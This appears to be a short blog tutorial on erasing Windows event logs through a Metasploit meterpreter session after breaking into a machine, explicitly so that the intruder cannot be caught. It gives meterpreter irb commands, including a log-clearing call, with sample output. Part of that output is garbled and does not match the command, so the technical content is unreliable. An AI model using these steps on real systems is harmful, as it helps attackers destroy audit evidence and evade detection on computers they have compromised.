Remove Event Log - Cover Track After Hacking Metasploit
There are so many ways to hack into a computer but after comprising the computer an attacker (hacker) needs to cover their track because each and every activity that a hacker do (or a normal user do) is recorded by the system. So whenever a hacker hack into a web server or a computer than after doing the work an attacker usually cover the track so that no one is able to catch them. How to cover your track after hacking or how a hacker cover their track is an important topic of discussion and need more tutorial because every operating system has its own way to maintain the logs.
Log files contain the information of every activity that has been done on a computer so it is very important to remove this log file. There are different way to remove log files on windows, Linux and MAC but in this tutorial I will show you how to remove event log management by using Metasploit post exploitation tutorial for windows.
Requirement
- Metasploit (Backtrack 5 r1 using for tutorial, you can use some other too)
- A compromised host (it is very easy to hack into windows by using metasploit, as discussed before if you don't know how than let us know I will share the link of the previous tutorial)
- A brain
Now let suppose you have hacked a windows operating system and you have a meterpreter session than you can do multiple things via meterpreter session like you can cover your track by removing the log file. The picture below shows that how a windows maintain logs that an attacker need to remove.
On our meterpreter session we need to call a post exploitation script that is available and has been given with metasploit (you can create some more script too). Lets call irb
meterpreter > irb[*] Starting IRB shell[*] The 'client' variable holds the meterpreter client>> client.sys.config.sysinfo()=> {"Computer"=>"VIRTUAL-7C33D2A", "OS"=>"Windows XP (Build 2600, Service Pack 2).", "Architecture"=>"x86", "System Language"=>"en_US"}
Than we need to clear the log it requires an easy command.
>> log.clear=> #<#:0xb6779424 @client=#>,/trendmicro_serverprotect_earthagent"=>#, "windows/browser/ie_iscomponentinstalled"=>#, "windows/exec/reverse_ord_tcp"=>#, "windows/http/apache_chunked"=>#, "windows/imap/novell_netmail_append"=>#
Thats it.
Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our RSS feed and Email Subscription or become our Facebook fan! You will get all the latest updates at both the places.